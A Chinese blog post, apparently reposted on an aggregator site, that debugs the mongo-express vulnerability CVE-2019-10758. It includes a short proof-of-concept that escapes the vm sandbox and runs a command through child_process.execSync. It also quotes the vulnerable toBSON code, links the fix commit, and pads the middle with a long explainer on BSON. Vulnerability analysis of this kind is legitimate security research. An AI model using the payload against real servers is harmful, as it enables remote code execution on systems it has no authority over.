CVE-2019-10758漏洞debug过程(nodejs)

Posted ph4nt0mer

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2019-10758漏洞debug过程(nodejs)相关的知识,希望对你有一定的参考价值。

CVE-2019-10758

根据https://github.com/masahiro331/CVE-2019-10758/blob/master/main.js的内容可知,在上一篇里已经讲了怎么debug调试nodejs。

所以在工作区新建一个test.js的文件。内容为:

exploit = "this.constructor.constructor(\\"return process\\")().mainModule.require(\'child_process\').execSync(\'/Applications/CotEditor.app/Contents/MacOS/CotEditor\')"

var bson = require(\'mongo-express/lib/bson\')
bson.toBSON(exploit)

至于想执行的命令可以自行更改,我这边是运行一个mac下的软件。

 

根据poc可知,漏洞关键点在bson库里的toBSON函数。百度一下bson是什么东西?和json又有什么关系?

引用:https://blog.csdn.net/m0_38110132/article/details/77716792

参考百科说明:BSON( Binary Serialized Document Format) 是一种二进制形式的存储格式,采用了类似于 C 语言结构体的名称、对表示方法,支持内嵌的文档对象和数组对象,具有轻量性、可遍历性、高效性的特点,可以有效描述非结构化数据和结构化数据。

BSON是一种类json的一种二进制形式的存储格式,简称Binary JSON,它和JSON一样,支持内嵌的文档对象和数组对象,但是BSON有JSON没有的一些数据类型,如Date和BinData类型。
BSON可以做为网络数据交换的一种存储形式,这个有点类似于Google的Protocol Buffer,但是BSON是一种schema-less的存储形式,它的优点是灵活性高,但它的缺点是空间利用率不是很理想,
BSON有三个特点:轻量性、可遍历性、高效性。

例子

一个Document的BSON表示

{
    title:"MongoDB",
    last_editor:"192.168.1.122",
    last_modified:new Date("27/06/2011"),
    body:"MongoDB introduction",
    categories:["Database","NoSQL","BSON"],
    revieved:false
}

这是一个简单的BSON结构体,其中每一个element都是由key/value对组成的

一个嵌套的例子

{
    name:"lemo",
    age:"12",
    address:{
        city:"suzhou",
        country:"china",
        code:215000
    } ,
    scores:[
        {"name":"english","grade:3.0},
        {"name":"chinese","grade:2.0}
    ]
}

这是一种相对复杂点的例子,其中包括了地址对象和分数对象数组,这里使用了嵌套文档对象与文档对象数据来表示单个学生的信息,这种嵌套的文档结构要使用关系数据库来做是比较复杂的。
与JSON的区别
以下内容参考自 http://blog.csdn.net/z69183787/article/details/26709505 感谢谢原作者。
BSON是由10gen开发的一个数据格式,目前主要用于MongoDB中,是mongodb的数据存储格式。BSON基于JSON格式,选择JSON进行改造的原因主要是JSON的通用性及JSON的schemaless的特性。
BSON主要会实现以下三点目标:
(1)更快的遍历速度
对JSON格式来说,太大的JSON结构会导致数据遍历非常慢。在JSON中,要跳过一个文档进行数据读取,需要对此文档进行扫描才行,需要进行麻烦的数据结构匹配,比如括号的匹配,而BSON对JSON的一大改进就是,它会将JSON的每一个元素的长度存在元素的头部,这样你只需要读取到元素长度就能直接seek到指定的点上进行读取了。
(2)操作更简易
对JSON来说,数据存储是无类型的,比如你要修改基本一个值,从9到10,由于从一个字符变成了两个,所以可能其后面的所有内容都需要往后移一位才可以。而使用BSON,你可以指定这个列为数字列,那么无论数字从9长到10还是100,我们都只是在存储数字的那一位上进行修改,不会导致数据总长变大。当然,在MongoDB中,如果数字从整形增大到长整型,还是会导致数据总长变大的。
(3)增加了额外的数据类型
JSON是一个很方便的数据交换格式,但是其类型比较有限。BSON在其基础上增加了“byte array”数据类型。这使得二进制的存储不再需要先base64转换后再存成JSON。大大减少了计算开销和数据大小。
但是,在有的时候,BSON相对JSON来说也并没有空间上的优势,比如对{“field”:7},在JSON的存储上7只使用了一个字节,而如果用BSON,那就是至少4个字节(32位)
目前在10gen的努力下,BSON已经有了针对多种语言的编码解码包。并且都是Apache 2 license下开源的。并且还在随着MongoDB进一步地发展。

 

 1 exports.toBSON = function (string) {
 2   var sandbox = exports.getSandbox();
 3 
 4   string = string.replace(/ISODate\\(/g, \'new ISODate(\');
 5   string = string.replace(/Binary\\(("[^"]+"),/g, \'Binary(new Buffer($1, "base64"),\');
 6 
 7   vm.runInNewContext(\'doc = eval((\' + string + \'));\', sandbox);
 8 
 9   return sandbox.doc;
10 };

跟踪来到第7行,发现eval和之前string代码进行拼接了。百度查看vm.runInNewContext的函数意义。

 

 

emmm。。。。运行js代码。。。那就直接拼接了代码。。。。直接执行了命令。

查看这个文件的history。发现修复方式是删除了vm这个库的引用。

https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2#diff-a3edef2410fccadc68e7b4237d3495d6

 

 

以上是关于CVE-2019-10758漏洞debug过程(nodejs)的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2019-10758-Mongo-express-远程代码执行

应用安全 - 数据库 | 工具 - mongo数据库 - mongo-express - 漏洞 - 汇总

通常大家说的“bug”和“debug”都指啥?

动手实验Django debug page XSS漏洞复现

Django debug page XSS漏洞(CVE-2017-12794)

IDEA debug漏洞第一篇(weblogic,cve-2017-10271)